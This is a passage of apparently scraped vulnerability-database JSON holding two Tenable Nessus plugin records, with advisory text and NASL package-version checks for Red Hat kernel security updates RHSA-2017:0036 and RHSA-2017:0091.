(MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)", "edition": 9, "reporter": "Tenable", "published": "2017-01-11T00:00:00", "title": "RHEL 6 : kernel (RHSA-2017:0036)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2017-0036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96403", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0036. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96403);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_xref(name:\"RHSA\", value:\"2017:0036\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2017:0036)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service,\nheap disclosure, or further impact was found in setsockopt(). The\nfunction call is normally restricted to root, however some processes\nwith cap_sys_admin may also be able to trigger this flaw in privileged\ncontainer environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a\ncode path of a client that returns the file layout. As a result, the\nkernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to\ncrash on a Nonmaskable Interrupt (NMI) that was injected from the\nhost, this VM became unresponsive and did not create the vmcore dump\nfile. This update applies a set of patches to the Virtual Machine Bus\nkernel driver (hv_vmbus) that fix this bug. As a result, the VM now\nfirst creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the\nDST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct\nvalues. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over\nEthernet (FCoE) stack, suboptimal performance in some cases occurred\non systems with a large number of CPUs. This update fixes the\nfc_exch_alloc() function to try all the available exchange managers in\nthe list for an available exchange ID. This change avoids failing\nallocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot\nresolution automatically. Consequently, users were not able to change\nthe resolution by manual setting of the kernel's 'vga=' parameter in\nthe /boot/grub/ grub.conf file. This update adds the 'nomodeset'\nparameter, which can be set in the /boot/grub/grub.conf file. The\n'nomodeset' parameter allows the users to prevent the vmwgfx driver\nfrom loading. As a result, the setting of the 'vga=' parameter works\nas expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based\nsystems, Desktop Management Interface (DMI) information, which is\nreferenced by several applications, such as NEC server's memory RAS\nutility, was missing entries in the sysfs virtual file system. This\nupdate fixes the underlying source code, and sysfs now shows the DMI\ninformation as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the\nmedia access control (MAC) address to a VLAN interface did not work in\nRed Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter\nwas set to fail_over_mac=active. With this update, the underlying\nsource code has been fixed so that the VLANs continue inheriting the\nMAC address of the active physical interface until the VLAN MAC\naddress is explicitly set to any value. As a result, IPv6 EUI64\naddresses for the VLAN can reflect any changes to the MAC address of\nthe physical interface, and Duplicate Address Detection (DAD) behaves\nas expected. (BZ#1396479)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0036\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0036\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-abi-whitelists-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-27T05:11:03", "references": ["https://access.redhat.com/security/cve/cve-2016-6828", "https://access.redhat.com/errata/RHSA-2017:0091", "http://www.nessus.org/u?3395ff0b", "https://access.redhat.com/security/cve/cve-2016-9555", "https://access.redhat.com/security/cve/cve-2016-7117"], "pluginID": "96594", "description": "An update for kernel-rt is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of sctp protocol in which a remote attacker can trigger an out of bounds read with an offset of up to 64kB. This may panic the machine with a page-fault. (CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.6.1 source tree, which provides a number of bug fixes over the previous version. (BZ# 1401863)\n\n* Previously, the device mapper (DM) subsystem was not notified that the real-time kernel changes the way preemption works with spinlocks.\nThis caused a kernel panic when the dm-multipath kernel module was loaded because the interrupt request (IRQ) check was invalid on the real-time kernel. This check has been corrected enabling the system to boot correctly with the dm-multipath module enabled. (BZ#1400930)\n\n* Unlike the standard Linux kernel, the real-time kernel does not disable interrupts inside the Interrupt Service Routines driver.\nBecause of this difference, a New API (NAPI) function for turning interrupt requests (IRQ) off was actually being called with IRQs enabled. Consequently, the NAPI poll list was being corrupted, causing improper networking card operation and potential kernel hangs. With this update, the NAPI function has been corrected to force modifications of the poll list to be protected allowing proper operation of the networking card drivers. (BZ#1402837)", "edition": 9, "reporter": "Tenable", "published": "2017-01-18T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2017:0091)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2018-11-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2017-0091.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0091. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96594);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n script_xref(name:\"RHSA\", value:\"2017:0091\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2017:0091)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of sctp\nprotocol in which a remote attacker can trigger an out of bounds read\nwith an offset of up to 64kB. This may panic the machine with a\npage-fault. (CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.6.1\nsource tree, which provides a number of bug fixes over the previous\nversion. (BZ# 1401863)\n\n* Previously, the device mapper (DM) subsystem was not notified that\nthe real-time kernel changes the way preemption works with spinlocks.\nThis caused a kernel panic when the dm-multipath kernel module was\nloaded because the interrupt request (IRQ) check was invalid on the\nreal-time kernel. This check has been corrected enabling the system to\nboot correctly with the dm-multipath module enabled. (BZ#1400930)\n\n* Unlike the standard Linux kernel, the real-time kernel does not\ndisable interrupts inside the Interrupt Service Routines driver.\nBecause of this difference, a New API (NAPI) function for turning\ninterrupt requests (IRQ) off was actually being called with IRQs\nenabled. Consequently, the NAPI poll list was being corrupted, causing\nimproper networking card operation and potential kernel hangs. With\nthis update, the NAPI function has been corrected to force\nmodifications of the poll list to be protected allowing proper\noperation of the networking card drivers. (BZ#1402837)\"\n );\n # https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9555\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif 